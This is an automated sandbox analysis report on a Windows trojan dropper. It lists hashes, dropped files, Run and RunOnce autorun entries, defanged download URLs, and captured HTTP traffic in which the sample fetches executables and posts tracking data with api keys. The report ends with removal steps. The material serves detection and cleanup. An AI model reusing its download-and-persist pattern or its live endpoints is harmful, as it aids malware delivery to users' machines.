Sample_a4e3362c71
HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: a4e3362c71547941a74d03b270b46e81
SHA1: 62b51f2fdd6799643d9164bd4b6ff6980cd9563c
SHA256: ba4b897f00b1e502f36120cd3911e3e732fb558f249ce4255cfdc13ddb76cb44
SSDeep: 24576:srFYHdwVDIfQE3EpM6u7MTqrpH9jc4FbA5WZ04xDrNzJFYE1AvaQp86Xo0L0nCy6:fy7Y9H9j/k580IDV5VrGxvNX2
Size: 2155520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Kobit
Created at: 2017-08-21 06:20:48
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:3664
cKgIbDKpjiaF3kq96ZCB.exe:796
Sho9libi.exe:3876
%original file name%.exe:1900
The Trojan injects its code into the following process(es):
cKgIbDKpjiaF3kq96ZCB.exe:2176
kc2zt4jv2nb.exe:2748
cKgIbDKpji.exe:600
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe (204 bytes)
The process cKgIbDKpjiaF3kq96ZCB.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe (227430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe (400 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe.config (1 bytes)
The process Sho9libi.exe:3876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3876.434181 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3876.434181 (0 bytes)
The process %original file name%.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe (54882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe (19522 bytes)
The process cKgIbDKpji.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (36 bytes)
Registry activity
The process SecondL.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process cKgIbDKpjiaF3kq96ZCB.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process cKgIbDKpjiaF3kq96ZCB.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_PMJXG" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Sho9libi.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process %original file name%.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "05/09/2017"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process kc2zt4jv2nb.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"0dlt4xjqyxw" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe"
The process cKgIbDKpji.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"EnableFileTracing" = "0"
To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CGXYQCF886G0GDX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 7005973f1462edbf5f1986f5ccd2fe99 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe |
| f7f76a1d4a5978dece064147e1c6fe53 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe |
| 755a66c5d1e7c178f070d11ac0fac010 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe |
| 9adb4086f9d342fb48483ed2c5a22c46 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe |
| 251952fc1f613e50fa43e7c49d395df5 | c:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: B
Product Name: B
Product Version: 0.1.2.0
Legal Copyright: Copyright (c) 6920
Legal Trademarks:
Original Filename: E3443.exe
Internal Name: E3443.exe
File Version: 0.1.2.0
File Description: B
Comments: BG
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2149872 | 2149888 | 4.16598 | bf78ca826c09fb7e35cfdf6770343b3c |
| .rsrc | 2162688 | 4404 | 4608 | 3.47994 | e31f743409850d4761eb25d76215bf57 |
| .reloc | 2170880 | 12 | 512 | 0.070639 | 1a267295e843ca20c95c7f167f73ca04 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://bratitlamio.com/get/4/remote.exe | |
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://bratitlamio.com/get/3/wizzcaster_v2.exe | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok | |
| hxxp://ladomainadeserver.com/api/v5/config | |
| hxxp://ladomainadeserver.com/api/v5/link | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_channel_name=1
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:23 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=lm9u20570ksvenj4q382ksgsp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1076
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:17:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=8f3168b99e0e8abb03a6e76bcb1542eefdf7924f; expires=Tue, 05-Sep-2017 01:17:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:17:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=8df5f4a8016108a3dc92ca1df3b2daab6027bf24; expires=Tue, 05-Sep-2017 01:17:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:24 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/4/remote.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:21 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:29 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:32 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=7n4hpe131o2lnmdpqo6jhqirh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 04 Sep
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:3664
cKgIbDKpjiaF3kq96ZCB.exe:796
Sho9libi.exe:3876
%original file name%.exe:1900
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe (227430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe (400 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe (54882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe (19522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (36 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_PMJXG" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"0dlt4xjqyxw" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CGXYQCF886G0GDX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.